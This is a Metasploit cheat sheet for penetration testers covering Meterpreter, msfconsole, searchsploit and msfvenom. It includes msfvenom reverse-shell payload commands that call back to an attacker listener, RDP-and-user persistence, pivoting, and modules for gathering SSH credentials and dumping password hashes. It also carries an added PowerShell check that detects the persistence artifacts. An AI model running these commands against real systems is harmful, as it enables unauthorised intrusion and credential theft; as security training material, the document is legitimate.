Metasploit Framework
Metasploit is an open source platform for developing and implementing automated attacks and defenses.
Download
Or install with apt install metasploit-framework
Meterpreter
Meterpreter is a translation layer built into the Metasploit Framework console. It lets you interact from your own OS's shell with another OS's shell, translating commands appropriately between the two.
Some handy commands:
- import module - allows meterpreter to import a module, like powershell
- load sourcefile destinationfile - allows meterpreter to load a file onto the target machine from the local machine
- (PERSISTENCE) run getgui -e -u username -p password - Meterpreter script to enable RDP and create a user with a password
- (PIVOTING) run autoroute -s 192.168.0.0/24 - Meterpreter script to add a route from attacker to target IP/subnet. Use run autoroute -p to view autoroutes
- IN MSFCONSOLE: sessions -u sessionid - upgrades a session to a meterpreter shell (This will always use the same port, so if you need to upgrade multiple sessions, consider using multi/manage/shell_to_meterpreter)
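As an added defender-side example (not from the original cheat sheet), a PowerShell check for the two host artifacts the getgui script above leaves on a Windows machine: Remote Desktop switched on and a freshly created local account. It assumes an elevated PowerShell session on the host being checked and that account-management auditing (Security event 4720) is enabled; the look-back window $Days is a constructed default.

```powershell
# Added example, not part of the original cheat sheet: look for the artifacts
# of "run getgui -e -u <user> -p <pass>" (RDP enabled + new local account).
# Assumptions: elevated PowerShell on the host being checked; Security log
# readable and "User Account Management" auditing on; $Days is a constructed default.
param([int]$Days = 1)

$findings = @()

# 1. Remote Desktop state. Enabling RDP sets fDenyTSConnections to 0 under
#    HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server.
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$ts = Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue
if ($ts -and $ts.fDenyTSConnections -eq 0) {
    $findings += 'Remote Desktop is enabled (fDenyTSConnections = 0)'
}

# 2. Recently created local accounts. Security event 4720 is logged for
#    "A user account was created"; TargetUserName is the new account and
#    SubjectUserName is the account that created it.
$since  = (Get-Date).AddDays(-$Days)
$filter = @{ LogName = 'Security'; Id = 4720; StartTime = $since }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
foreach ($ev in $events) {
    $xml  = [xml]$ev.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $findings += ('Local account "{0}" created by "{1}" at {2}' -f $data['TargetUserName'], $data['SubjectUserName'], $ev.TimeCreated)
}

# 3. Report. Either artifact alone can be legitimate admin activity; both
#    appearing in the same window is what a getgui-style persistence looks like.
if ($findings.Count -eq 0) {
    Write-Output "No RDP-enable or account-creation artifacts found in the last $Days day(s)."
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
}
```

Run it as `.\check-getgui.ps1 -Days 7` to widen the window; a hit on both checks is worth correlating with 4624 logon-type-10 (RDP) events for the new account.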
Msfconsole
Msfconsole is a CLI tool that can be used to interact with Metasploit
Usage:
- msfconsole - starts the console
- search term - searches the database for exploits/payloads
- You can also use filters in your search, such as type:exploit to search specifically for exploits
- use # - selects exploit based on corresponding number
- show payloads - lists available payloads for selected exploit
- use # - selects payload
- show options - lists available options for exploit and payload
- set OPTION value - sets an option
- exploit or run - runs the selected exploit
Some important things to note:
- Creating a workspace can help you organize your work: to create a new workspace, type workspace -a workspacename, and to switch to a workspace, type workspace workspacename
- Sessions are often created when an exploit opens a shell. Type sessions to list all sessions and sessions -i sessionid to interact with one. You can upgrade a session to a meterpreter shell with sessions -u sessionid
- Your payload is typically OS-dependent, meaning that a 64-bit Windows payload must be used for a 64-bit Windows target, and so on. Similarly, your multi/handler payload will (usually) have to match your generated payload
- A stageless payload is usually much larger than a staged payload, and exploits may have a limit on the size of a payload
- Sometimes jobs can get stuck and cause conflicts with ports or re-running commands. Type jobs to list all jobs and jobs -k jobid to kill a job
- db_nmap - NMAP with database saving
  - Ensure that the postgresql database is running (systemctl start postgresql)
  - Ensure that the metasploit database is running (msfdb init)
  - Set up a workspace to save and organize your data (workspace -a workspacename)
  - Use db_nmap OTHER_NORMAL_NMAP_OPTIONS to run NMAP
  - After you have used a db_nmap command, you can view information about your scan(s) with several commands:
    - hosts - list all hosts in the database
    - services - list all services in the database
Some useful payloads/exploits:
- UAC bypass
- Eternal Blue
- linux/samba/is_known_pipename - SAMBA login
- post/multi/gather/ssh_creds - Gather SSH credentials
- post/linux/gather/hashdump - Linux unshadow hashdump
- (PERSISTENCE) exploit/windows/local/persistence_service - Windows service persistence
- exploit/windows/smb/psexec - Windows SMB psexec
- windows/x64/meterpreter_reverse_tcp - 64-bit stageless reverse TCP Meterpreter shell
Searchsploit
Searchsploit is a CLI tool that can be used to search for exploits
Usage:
- searchsploit term - searches the database for exploits
- You can also copy (mirror) one of the listed exploits into your current directory with searchsploit -m 123456 (replace 123456 with the ID shown in the "Path" column)
Msfvenom
Msfvenom is a CLI tool that can be used to create executable payloads
Usage:
msfvenom -p cmd/unix/reverse_netcat LHOST=LOCALMACHINE LPORT=4444 -f filetype R > output
Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=1234 -f asp R > output.asp
After uploading this to the target, you would typically use multi/handler in msfconsole as your exploit and windows/meterpreter/reverse_tcp as your payload, making sure the LHOST and LPORT options in Metasploit match the ones used when generating the payload
- -p: specifies payload
- -lhost: specifies listening host
- -lport: specifies listening port
- -R: specifies raw format